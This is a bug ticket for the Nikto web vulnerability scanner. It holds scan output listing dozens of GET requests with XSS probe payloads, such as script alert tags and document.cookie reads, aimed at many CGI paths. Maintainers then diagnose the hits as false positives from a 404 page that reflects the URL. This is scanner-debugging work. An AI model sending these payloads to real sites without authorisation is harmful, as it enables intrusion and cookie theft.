+ OSVDB-5461: GET /webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /cgi.cgi/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /webcgi/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /cgi-914/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /cgi-915/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /cgi/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /mpcgi/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /ows-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /cgi-local/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /htbin/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /cgibin/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /cgis/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /scripts/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /cgi-win/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /fcgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /cgi-exe/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /cgi-home/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5461: GET /cgi-perl/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6659: GET /zdtpQLEsh4cy5ECDiTBGVskRfrcNZTeB7mVDr5GRF9WTZ3siep30m0UcbcjilfiKqZG0Yk5MbBD0MkB5Jhaj4B7F2i7dZ7qLJACN72Lfhczp7nVP9i1BUeaNvy5954Gxvl2AXYkn7lYqX12Ku5lBMC6obKE7D2FN6sA1HFWX9tVjPbv0vQplNVSF5R0gKDTRv071ltyUHLeiffruWXWABRVroP9Xg3W<font%20size=50>DEFACED<!--//-- : MyWebServer 1.0.2 is vulnerable to HTML injection. Upgrade to a later version.
+ OSVDB-698: GET /cgi.cgi/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /webcgi/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /cgi-914/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /cgi-915/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /cgi/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /mpcgi/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /ows-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /cgi-local/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /htbin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /cgibin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /cgis/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /scripts/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /cgi-win/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /fcgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /cgi-exe/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /cgi-home/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-698: GET /cgi-perl/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> : Agora.cgi is vulnerable to Cross Site Scripting (XSS), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1199, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-701: GET /pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script> : Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-701: GET /pls/help/<script>alert('Vulnerable')</script> : Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-20954: GET /shopadmin.asp?Password=abc&UserName=\"><script>alert(foo)</script> : VP-ASP Shopping Cart 5.50 shopadmin.asp UserName Variable XSS.
+ OSVDB-20406: GET /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> : PHP contains a flaw that allows a remote cross site scripting attack.
+ OSVDB-24484: GET /phpinfo.php?cx[]=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<script>alert(foo)</script> : PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS
+ OSVDB-35935: GET /rpc.php?q=\"><script>alert(document.cookie)</script> : Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the q variable.
+ OSVDB-3233: GET /icons/README : Apache default file found.
+ 3577 items checked: 721 item(s) reported on remote host
+ End Time:        2008-10-16 1:50:01 (18186 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Change History

10/16/08 08:21:40 changed by deity

You can't reply to the ticket as you're not a member of assembla; I've set up the rights so anybody can report a new bug; but you need to be a member of the team to add comments.

You may want to take this to the nikto discussion list (though I won't be able to respond immediately, as at the moment I can only read my email, not respond). Or you can email me personally (email address can be seen in the nikto-discuss archives).

It looks like the web server's 404 page just reflects back the URL its given, which is what nikto is looking for in the resultant page. A redacted copy of the 404 page would be useful; though we may not be able to fix this if the web server is not configured to give 404s properly.

01/29/09 13:29:28 changed by deity

Adding information from duplicate #61:

hundreds of fales positives.

Reported by: testbot Assigned to:

Priority: high Milestone: Nikto 2.10

Component: Scanner Version: 2.03

Severity: critical Keywords: 404

Cc:
Description

after a scan we get hundreds of false positives. is there a problem with 404 detection?

command:

/opt/nikto.pl -config /opt/config.txt -C all -evasion 12 -Format xml -o $output_file -host $host -Pause 1 -mutate 2 -vhost www.example.com"

08/02/09 11:06:44 changed by deity

#60 is a duplicate of this - scanning for XSS. Though I suspect that it's due to the 404 page returning an exact copy of the XSS - so it sounds like it is vulnerable!

08/04/09 21:39:50 changed by deity

  • milestone changed from Nikto 2.1.0 to Future.

Moving to future as need further information about the server.

10/28/09 02:14:50 changed by sullo

  • status changed from new to closed.
  • resolution set to wontfix.

Going to close this as it's been open for over 2 months with no additional info on the server. I'm sure this scenario will come up again!